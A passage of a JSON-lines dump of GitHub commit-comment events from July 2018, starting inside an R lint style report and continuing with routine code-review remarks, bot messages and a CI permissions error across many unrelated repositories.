~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T04:53:46Z"}
{"id":"7980637644","type":"CommitCommentEvent","actor":{"login":"haskell-jp-bot"},"repo":{"name":"haskell-jp/blog"},"payload":{"comment":{"id":29744041,"position":null,"line":null,"path":null,"commit_id":"92a42f81663bddb69ca69112871e07fee8977120","created_at":"2018-07-18T04:54:21Z","updated_at":"2018-07-18T04:54:21Z","author_association":"NONE","body":"https://circleci.com/gh/haskell-jp/blog/497/artifacts/0/root/project/generated-site/index.html"}},"created_at":"2018-07-18T04:54:21Z"}
{"id":"7980640538","type":"CommitCommentEvent","actor":{"login":"agusdwimuladi"},"repo":{"name":"certsocietegenerale/fame"},"payload":{"comment":{"id":29744051,"position":null,"line":null,"path":null,"commit_id":"c3077c930d355bd2b80063f25c1ff03433a4d892","created_at":"2018-07-18T04:55:34Z","updated_at":"2018-07-18T04:55:34Z","author_association":"NONE","body":"excussme, i wont ask about difference color pink and gren and whether here we live to follow the text of the above improvements, thank you."}},"created_at":"2018-07-18T04:55:34Z"}
{"id":"7980641262","type":"CommitCommentEvent","actor":{"login":"Huan1210"},"repo":{"name":"Huan1210/Designers-Learn-Git"},"payload":{"comment":{"id":29744053,"position":null,"line":null,"path":null,"commit_id":"2faf7a5f6586388243dff26e59baa2623bfcfe0b","created_at":"2018-07-18T04:55:51Z","updated_at":"2018-07-18T04:55:51Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-18T04:55:51Z"}
{"id":"7980641394","type":"CommitCommentEvent","actor":{"login":"tonyzzp"},"repo":{"name":"tonyzzp/flutter_cache_manager"},"payload":{"comment":{"id":29744055,"position":null,"line":null,"path":null,"commit_id":"952aa027b0fda1ea554fdb6d25abf4fb48bc1f32","created_at":"2018-07-18T04:55:54Z","updated_at":"2018-07-18T04:55:54Z","author_association":"OWNER","body":"on Android. the  myfile.jpg path : /data/data/PACKAGENAME/cachemyfile.jpg -> /data/data/PACKAGENAME/cache/myfile.jpg"}},"created_at":"2018-07-18T04:55:54Z"}
{"id":"7980643917","type":"CommitCommentEvent","actor":{"login":"wt051453"},"repo":{"name":"wt051453/developers"},"payload":{"comment":{"id":29744060,"position":null,"line":null,"path":null,"commit_id":"db4a2e70c6bf99472c6bfe8b058303d07b1794fc","created_at":"2018-07-18T04:57:00Z","updated_at":"2018-07-18T04:57:00Z","author_association":"OWNER","body":"I added my name."}},"created_at":"2018-07-18T04:57:00Z"}
{"id":"7980649168","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"BioContainers/containers"},"payload":{"comment":{"id":29744070,"position":null,"line":null,"path":null,"commit_id":"a2626213cd7f24ff45d87bc93e09c7f01985ea48","created_at":"2018-07-18T04:59:16Z","updated_at":"2018-07-18T04:59:16Z","author_association":"CONTRIBUTOR","body":"No longranger/2.2.2/test-cmds.txt (test file) present, skipping tests"}},"created_at":"2018-07-18T04:59:16Z"}
{"id":"7980655402","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/pale-moon-localization"},"payload":{"comment":{"id":29744091,"position":4,"line":137,"path":"en-US-CrowdIn-source/chrome/AB-CD/locale/AB-CD/mozapps/downloads/downloads.properties","commit_id":"6bdea7704faba8a5b7e02c5434a3cb10e7d34e92","created_at":"2018-07-18T05:01:42Z","updated_at":"2018-07-18T05:01:42Z","author_association":"MEMBER","body":"Just needs some cleanup from the old dl manager.\r\n\r\ntitle is needed, just not the checkbox string."}},"created_at":"2018-07-18T05:01:42Z"}
{"id":"7980657634","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/pale-moon-localization"},"payload":{"comment":{"id":29744099,"position":4,"line":137,"path":"en-US-CrowdIn-source/chrome/AB-CD/locale/AB-CD/mozapps/downloads/downloads.properties","commit_id":"6bdea7704faba8a5b7e02c5434a3cb10e7d34e92","created_at":"2018-07-18T05:02:38Z","updated_at":"2018-07-18T05:02:38Z","author_association":"MEMBER","body":"Just needs some cleanup, is all."}},"created_at":"2018-07-18T05:02:38Z"}
{"id":"7980674145","type":"CommitCommentEvent","actor":{"login":"marchof"},"repo":{"name":"jacoco/jacoco"},"payload":{"comment":{"id":29744132,"position":59,"line":94,"path":"org.jacoco.core/src/org/jacoco/core/internal/analysis/MethodAnalyzer.java","commit_id":"1962cf59bc403a27f68c55b39bb833b00fa386a0","created_at":"2018-07-18T05:09:27Z","updated_at":"2018-07-18T05:09:27Z","author_association":"MEMBER","body":"So, never depend on internal APIs!"}},"created_at":"2018-07-18T05:09:27Z"}
{"id":"7980679194","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29744136,"position":null,"line":null,"path":null,"commit_id":"5c7c855d54b5be33b6e8cbb280e04efd614cdab0","created_at":"2018-07-18T05:11:29Z","updated_at":"2018-07-18T05:11:29Z","author_association":"COLLABORATOR","body":"The main changes here are:\r\n  \r\n  0) Promoting everything to `cf32`, aka`numpy.complex64`, to get around some problems with my old GPU\r\n  1)  Making per-polarization gridding kernels that accept all standpols as once\r\n  2) Changing the `matmul()` call to work on all times/channels/standpols at once\r\n  3) Adding in the IFFT back in\r\n  4) Transposing the image written to disk to get the orientation correct.\r\n\r\nIf anyone else wants to test this I used: `EPIC_bifrost.py -o -f 058092_001198771 -t 5`"}},"created_at":"2018-07-18T05:11:29Z"}
{"id":"7980680953","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29744140,"position":null,"line":null,"path":null,"commit_id":"675ff3ade3e3455d6b371833c306013622b03dfc","created_at":"2018-07-18T05:12:10Z","updated_at":"2018-07-18T05:12:10Z","author_association":"COLLABORATOR","body":"the link above is wrong, it should be https://www.db.yugioh-card.com/yugiohdb/faq_search.action?ope=5&fid=11645&keyword=&tag=-1"}},"created_at":"2018-07-18T05:12:10Z"}
{"id":"7980682129","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"jeffreyan11/uci-chess-engine"},"payload":{"comment":{"id":29744142,"position":null,"line":null,"path":null,"commit_id":"fb4dc5b3866367febb533019fc2bbccfd6b480db","created_at":"2018-07-18T05:12:36Z","updated_at":"2018-07-18T05:12:36Z","author_association":"CONTRIBUTOR","body":"I have absolutely ZERO idea how you get elo from IID. Unless your iidDepth formula is a magic one"}},"created_at":"2018-07-18T05:12:36Z"}
{"id":"7980682386","type":"CommitCommentEvent","actor":{"login":"nkarre"},"repo":{"name":"billybichon/liveGQL"},"payload":{"comment":{"id":29744143,"position":null,"line":null,"path":null,"commit_id":"42154b200727e70a7556e3ca89b217407d9b1a70","created_at":"2018-07-18T05:12:43Z","updated_at":"2018-07-18T05:12:43Z","author_association":"NONE","body":"Thanks for Library , can you please provide the subscriptions query samples.\r\n\r\nSubscription hs = liveGQL.subscribe( ? , household);\r\n\r\nExample : Need to create a  subscriptions with query.\r\nhousehold(\r\ndomain: String\r\nquery: String\r\n): HouseholdUpdate!"}},"created_at":"2018-07-18T05:12:43Z"}
{"id":"7980685527","type":"CommitCommentEvent","actor":{"login":"bvinayakumar"},"repo":{"name":"project-sunbird/sunbird-functional-tests"},"payload":{"comment":{"id":29744151,"position":35,"line":28,"path":"sunbird_service_api_test/src/test/java/org/sunbird/integration/test/user/GetUserByUserIdTest.java","commit_id":"c044830aba0b24dd618d3ec691273081b6b2532a","created_at":"2018-07-18T05:14:02Z","updated_at":"2018-07-18T05:14:02Z","author_association":"CONTRIBUTOR","body":"invalidUserId"}},"created_at":"2018-07-18T05:14:02Z"}
{"id":"7980687457","type":"CommitCommentEvent","actor":{"login":"motifej"},"repo":{"name":"avmaktslave/todo-react-redux"},"payload":{"comment":{"id":29744157,"position":9,"line":8,"path":"src/components/List/Todo.jsx","commit_id":"dff51e9590a6b60c979dd75aa88945428cb5b032","created_at":"2018-07-18T05:14:44Z","updated_at":"2018-07-18T05:14:44Z","author_association":"NONE","body":"you cam move onClick={()=>onDelete(id)} to level up and use just onClick={onDelete} without ID and remove props ID from this component"}},"created_at":"2018-07-18T05:14:44Z"}
{"id":"7980690470","type":"CommitCommentEvent","actor":{"login":"silelan"},"repo":{"name":"silelan/silelan.github.io"},"payload":{"comment":{"id":29744163,"position":null,"line":null,"path":null,"commit_id":"30f285ff7ff32cb8d8f840b9855748fc36d23d5c","created_at":"2018-07-18T05:15:53Z","updated_at":"2018-07-18T05:15:53Z","author_association":"OWNER","body":"silelaan.github.io"}},"created_at":"2018-07-18T05:15:53Z"}
{"id":"7980692847","type":"CommitCommentEvent","actor":{"login":"motifej"},"repo":{"name":"avmaktslave/todo-react-redux"},"payload":{"comment":{"id":29744166,"position":4,"line":3,"path":"src/actions/index.js","commit_id":"60e12c1a92c41b55c5ddb17830a6fad1ccee8d5f","created_at":"2018-07-18T05:16:50Z","updated_at":"2018-07-18T05:16:50Z","author_association":"NONE","body":"have to be imported from constants"}},"created_at":"2018-07-18T05:16:50Z"}
{"id":"7980697719","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29744181,"position":null,"line":null,"path":null,"commit_id":"3c32418c59d1df48c66a5f2bc817d7c01003fec3","created_at":"2018-07-18T05:18:49Z","updated_at":"2018-07-18T05:18:49Z","author_association":"COLLABORATOR","body":"I made some changes and it seems to be better.\n\n> On Jul 17, 2018, at 6:29 PM, James Kent <notifications@github.com> wrote:\n> \n> Hmmm okay, I'm definitely not doing something right then. I've committed what I have so far. I'm definitely not understanding how bifrost does its batching for the matmul step. I'll try again later.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-18T05:18:49Z"}
{"id":"7980699425","type":"CommitCommentEvent","actor":{"login":"uhyo"},"repo":{"name":"uhyo/jinrou"},"payload":{"comment":{"id":29744184,"position":null,"line":null,"path":null,"commit_id":"53eafbeeca75dd274dd92621791a52d81b25ffdd","created_at":"2018-07-18T05:19:28Z","updated_at":"2018-07-18T05:19:28Z","author_association":"OWNER","body":"The result included players who had given `type` as a sub role.\r\nFor example, `accessByJobType(\"Shishimai\")` included a player object whose type is Chemical(Werewolf, Shishimai), which leaded to error at https://github.com/uhyo/jinrou/blob/master/server/rpc/game/game.coffee#L6989 ."}},"created_at":"2018-07-18T05:19:28Z"}
{"id":"7980700294","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29744190,"position":null,"line":null,"path":null,"commit_id":"7de2595650f450eecb8d6d1e94e35e9f170d21e0","created_at":"2018-07-18T05:19:49Z","updated_at":"2018-07-18T05:19:49Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\nqueue:route:index.github.glandium.git-cinnabar.decision.7de2595650f450eecb8d6d1e94e35e9f170d21e0\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/glandium/git-cinnabar:decision-task\",\n  \"assume:repo:github.com/glandium/git-cinnabar:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:repo:github.com/glandium/git-cinnabar:decision-task\",\n    \"queue:route:index.github.glandium.git-cinnabar.decision.7de2595650f450eecb8d6d1e94e35e9f170d21e0\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/BqjssqA5Rwye692XUQYcwA\",\n                \"queue:schedule-task:taskcluster-github/BqjssqA5Rwye692XUQYcwA/BqjssqA5Rwye692XUQYcwA\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-18T05:19:49.703Z\n\n</details>"}},"created_at":"2018-07-18T05:19:49Z"}
{"id":"7980701619","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/pale-moon-localization"},"payload":{"comment":{"id":29744194,"position":4,"line":137,"path":"en-US-CrowdIn-source/chrome/AB-CD/locale/AB-CD/mozapps/downloads/downloads.properties","commit_id":"6bdea7704faba8a5b7e02c5434a3cb10e7d34e92","created_at":"2018-07-18T05:20:22Z","updated_at":"2018-07-18T05:20:22Z","author_association":"MEMBER","body":"See: https://github.com/MoonchildProductions/UXP/commit/8be0c16be614d54183ee3d4877e2243cb9e468c8"}},"created_at":"2018-07-18T05:20:22Z"}
{"id":"7980702775","type":"CommitCommentEvent","actor":{"login":"MatthewKatzen"},"repo":{"name":"HughParsonage/grattan"},"payload":{"comment":{"id":29744200,"position":25,"line":57,"path":"R/energy_supplement.R","commit_id":"6e89efedfb6aee18c23d673c19eafa301d9bd299","created_at":"2018-07-18T05:20:51Z","updated_at":"2018-07-18T05:20:51Z","author_association":"COLLABORATOR","body":"don't really understand this section. Could i do the following instead?\r\n```r\r\nif (missing(per)) {\r\n    stop(\"`per` not set\")\r\n  } else {\r\n```"}},"created_at":"2018-07-18T05:20:51Z"}
{"id":"7980703547","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"Exynos7870/android_vendor_samsung"},"payload":{"comment":{"id":29744202,"position":null,"line":null,"path":null,"commit_id":"9932a615f5dad3b6f0c8f8081165f7c0d09dabf4","created_at":"2018-07-18T05:21:10Z","updated_at":"2018-07-18T05:21:10Z","author_association":"CONTRIBUTOR","body":"he moron"}},"created_at":"2018-07-18T05:21:10Z"}
{"id":"7980705338","type":"CommitCommentEvent","actor":{"login":"HughParsonage"},"repo":{"name":"HughParsonage/grattan"},"payload":{"comment":{"id":29744208,"position":25,"line":57,"path":"R/energy_supplement.R","commit_id":"6e89efedfb6aee18c23d673c19eafa301d9bd299","created_at":"2018-07-18T05:21:51Z","updated_at":"2018-07-18T05:21:51Z","author_association":"OWNER","body":"No because `per` is optional. We don't want to have to set `per` each time when working interactively."}},"created_at":"2018-07-18T05:21:51Z"}
{"id":"7980705964","type":"CommitCommentEvent","actor":{"login":"uhyo"},"repo":{"name":"uhyo/jinrou"},"payload":{"comment":{"id":29744210,"position":8,"line":8,"path":"manual/changelog.jade","commit_id":"d8a804fca44eb275841e4b18ab0571c0d203299e","created_at":"2018-07-18T05:22:04Z","updated_at":"2018-07-18T05:22:04Z","author_association":"OWNER","body":"I see, I'll reconsider this and look into the remaining bug."}},"created_at":"2018-07-18T05:22:04Z"}
{"id":"7980726795","type":"CommitCommentEvent","actor":{"login":"HughParsonage"},"repo":{"name":"HughParsonage/grattan"},"payload":{"comment":{"id":29744267,"position":25,"line":57,"path":"R/energy_supplement.R","commit_id":"6e89efedfb6aee18c23d673c19eafa301d9bd299","created_at":"2018-07-18T05:29:55Z","updated_at":"2018-07-18T05:29:55Z","author_association":"OWNER","body":"I think a message is appropriate. It's a default so a warning is too harsh, yet a message reminds me to use `per` explicitly in programming. \r\n\r\n`missing(per)` is not the same as `is.na(per)` or `is.null(per)`, it just returns `TRUE` or `FALSE` depending on whether the argument was provided by the user, not whether its value is missing. \r\n\r\ne.g.\r\n\r\n``` r\r\nz <- function(x = 1) {\r\n  if (missing(x)) {\r\n    print(\"aaaaaaaaaaaa\")\r\n  }\r\n  return(x + 1)\r\n}\r\nz()\r\n#> [1] \"aaaaaaaaaaaa\"\r\n#> [1] 2\r\nz(1)\r\n#> [1] 2\r\nz(2)\r\n#> [1] 3\r\n```\r\n\r\n"}},"created_at":"2018-07-18T05:29:55Z"}
{"id":"7980730194","type":"CommitCommentEvent","actor":{"login":"PanPanCN"},"repo":{"name":"PanPanCN/PanPanMvvm.Toolkit"},"payload":{"comment":{"id":29744276,"position":null,"line":null,"path":null,"commit_id":"a15f365fc12fe773fb6d93d0968ba3b936bd6eea","created_at":"2018-07-18T05:31:09Z","updated_at":"2018-07-18T05:31:09Z","author_association":"OWNER","body":"ObservableObject是继承的INotifyPropertyChanged接口，实现属性发生改变发出通知方法。RelayEventCommand是针对事件绑定命令而设计的。可以了解下MvvmLight"}},"created_at":"2018-07-18T05:31:09Z"}
{"id":"7980734769","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29744282,"position":null,"line":null,"path":null,"commit_id":"0994b7b9fad845e4f3a96b3d7c59a35cbd2debc6","created_at":"2018-07-18T05:32:53Z","updated_at":"2018-07-18T05:32:53Z","author_association":"OWNER","body":"Task1\r\nexample 1 for courses Java\r\n\r\nСоздать программу, которая будет подсчитывать количество слов в предложении и выводить их в отсортированном виде. Предложение вводится вручную. (Разделители пробел (“ ”) и запятая (“,”))."}},"created_at":"2018-07-18T05:32:53Z"}
{"id":"7980735021","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744285,"position":26,"line":26,"path":"app/src/main/java/com/example/delhivery/newsapp/DetailActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T05:33:00Z","updated_at":"2018-07-18T05:33:00Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-18T05:33:00Z"}
{"id":"7980735281","type":"CommitCommentEvent","actor":{"login":"mattes"},"repo":{"name":"dcos/terraform-dcos"},"payload":{"comment":{"id":29744286,"position":7,"line":7,"path":"gcp/modules/dcos-tested-gcp-oses/platform/cloud/gcp/coreos_1576.5.0/setup.sh","commit_id":"1b49028deddf1618f2dc71ec5a7d0a48e09e0f98","created_at":"2018-07-18T05:33:05Z","updated_at":"2018-07-18T05:33:05Z","author_association":"NONE","body":"@bernadinm Why was `update-engine` disabled?"}},"created_at":"2018-07-18T05:33:05Z"}
{"id":"7980735656","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"yonghyun123/javaWeb"},"payload":{"comment":{"id":29744287,"position":null,"line":null,"path":null,"commit_id":"61e74eb27b89e2087422f5849e56e3d9d6e086fb","created_at":"2018-07-18T05:33:15Z","updated_at":"2018-07-18T05:33:15Z","author_association":"NONE","body":"그래서 IoC와 DI가 뭘까요"}},"created_at":"2018-07-18T05:33:15Z"}
{"id":"7980735984","type":"CommitCommentEvent","actor":{"login":"MatthewKatzen"},"repo":{"name":"HughParsonage/grattan"},"payload":{"comment":{"id":29744289,"position":25,"line":57,"path":"R/energy_supplement.R","commit_id":"6e89efedfb6aee18c23d673c19eafa301d9bd299","created_at":"2018-07-18T05:33:22Z","updated_at":"2018-07-18T05:33:22Z","author_association":"COLLABORATOR","body":"Oh I only just got it. I forgot that per is missing even though there is a default value, and then will fill in once it gets to the `paste0(per, \"ly\")` section."}},"created_at":"2018-07-18T05:33:22Z"}
{"id":"7980738141","type":"CommitCommentEvent","actor":{"login":"hhsprings"},"repo":{"name":"hhsprings/align-videos-by-sound"},"payload":{"comment":{"id":29744292,"position":null,"line":null,"path":null,"commit_id":"1c64e8657449f1f2e68902d1d0fc405c33c90a70","created_at":"2018-07-18T05:34:11Z","updated_at":"2018-07-18T05:34:11Z","author_association":"OWNER","body":"s/scrict validatiom/s**t**rict validatio**n**/"}},"created_at":"2018-07-18T05:34:11Z"}
{"id":"7980739420","type":"CommitCommentEvent","actor":{"login":"fslnote"},"repo":{"name":"fslnote/TIL"},"payload":{"comment":{"id":29744296,"position":6,"line":13,"path":"README.md","commit_id":"c405f467139c131899a52e039bd1085fec626f99","created_at":"2018-07-18T05:34:41Z","updated_at":"2018-07-18T05:34:41Z","author_association":"OWNER","body":"오늘은 커밋 안하셔도 돼요. 쉬는날이니까요."}},"created_at":"2018-07-18T05:34:41Z"}
{"id":"7980740346","type":"CommitCommentEvent","actor":{"login":"repletetop"},"repo":{"name":"openai/glow"},"payload":{"comment":{"id":29744298,"position":null,"line":null,"path":null,"commit_id":"a382fc3cf7eb314d692e12b50bea9584056a4a56","created_at":"2018-07-18T05:35:04Z","updated_at":"2018-07-18T05:35:04Z","author_association":"NONE","body":"OK"}},"created_at":"2018-07-18T05:35:04Z"}
{"id":"7980746500","type":"CommitCommentEvent","actor":{"login":"fslnote"},"repo":{"name":"fslnote/TIL"},"payload":{"comment":{"id":29744306,"position":null,"line":null,"path":null,"commit_id":"8f3d83458c388c558c6a61ed97e664f0405cc7b5","created_at":"2018-07-18T05:37:20Z","updated_at":"2018-07-18T05:37:20Z","author_association":"OWNER","body":"와 오늘 열심히 하셨구요"}},"created_at":"2018-07-18T05:37:20Z"}
{"id":"7980752617","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"yonghyun123/javaWeb"},"payload":{"comment":{"id":29744323,"position":null,"line":null,"path":null,"commit_id":"61e74eb27b89e2087422f5849e56e3d9d6e086fb","created_at":"2018-07-18T05:39:33Z","updated_at":"2018-07-18T05:39:33Z","author_association":"OWNER","body":"IoC는 프로그래머가 했던 객체생성 제어권을 컨테이너에게 넘겨주는 것이라고 합니다~\r\n예를들어 car 객체를 쓸때 ApplicationContext에서 메모리에 올라온 객체들을 사용할 수 있도록 한 것입죠.\r\nDI는 car와 engine에서 setEngine같은 객체 의존성을 컨테이너가 주입하도록 하는 것입죠"}},"created_at":"2018-07-18T05:39:33Z"}
{"id":"7980754178","type":"CommitCommentEvent","actor":{"login":"nimble-squirrel"},"repo":{"name":"Rantastique/Funktionsplot"},"payload":{"comment":{"id":29744326,"position":null,"line":null,"path":null,"commit_id":"48cbe1252a65b87c9a949eeea0c520dcb5bb6a83","created_at":"2018-07-18T05:40:08Z","updated_at":"2018-07-18T05:40:08Z","author_association":"COLLABORATOR","body":"Ich habe eine andere Variante der Ableitung getestet und vergessen, die zu kommentieren. Istvan, deine funktioniert super, ich verstehe sie aber nicht... Könntest du sagen ob es genau das gleiche ist?\r\n"}},"created_at":"2018-07-18T05:40:08Z"}
{"id":"7980754875","type":"CommitCommentEvent","actor":{"login":"rnaster"},"repo":{"name":"TheNexCloud/NexProphet"},"payload":{"comment":{"id":29744329,"position":null,"line":null,"path":null,"commit_id":"a4c20c2509fbf9fd1600476fb817b94afd28b6ed","created_at":"2018-07-18T05:40:22Z","updated_at":"2018-07-18T05:40:22Z","author_association":"COLLABORATOR","body":"fix #10 \r\n"}},"created_at":"2018-07-18T05:40:22Z"}
{"id":"7980756487","type":"CommitCommentEvent","actor":{"login":"Taloth"},"repo":{"name":"Sonarr/Sonarr"},"payload":{"comment":{"id":29744331,"position":10,"line":15,"path":"src/NzbDrone.Core/Download/Clients/Nzbget/NzbgetSettings.cs","commit_id":"9c9ad9aec3a2022ef703393baab3f02305bbba53","created_at":"2018-07-18T05:40:57Z","updated_at":"2018-07-18T05:40:57Z","author_association":"MEMBER","body":"Tnx, fixed it."}},"created_at":"2018-07-18T05:40:57Z"}
{"id":"7980759140","type":"CommitCommentEvent","actor":{"login":"chicky77"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29744334,"position":2,"line":1,"path":"src/CryptoNoteConfig.h","commit_id":"8edd998304431c219b432194b7a3847b44b576c3","created_at":"2018-07-18T05:41:55Z","updated_at":"2018-07-18T05:41:55Z","author_association":"NONE","body":"const char CRYPTONOTE_NAME[] = \"ChickyCoin\";"}},"created_at":"2018-07-18T05:41:55Z"}
{"id":"7980759986","type":"CommitCommentEvent","actor":{"login":"zixia"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29744337,"position":31,"line":35,"path":"examples/starter-bot.js","commit_id":"feae020e4dd5d62baf4ea69fb99ba81efa36ef87","created_at":"2018-07-18T05:42:12Z","updated_at":"2018-07-18T05:42:12Z","author_association":"MEMBER","body":"Yes, you are right. I'll put it back."}},"created_at":"2018-07-18T05:42:12Z"}
{"id":"7980760552","type":"CommitCommentEvent","actor":{"login":"chicky77"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29744338,"position":2,"line":1,"path":"src/CryptoNoteConfig.h","commit_id":"8edd998304431c219b432194b7a3847b44b576c3","created_at":"2018-07-18T05:42:24Z","updated_at":"2018-07-18T05:42:24Z","author_association":"NONE","body":"..."}},"created_at":"2018-07-18T05:42:24Z"}
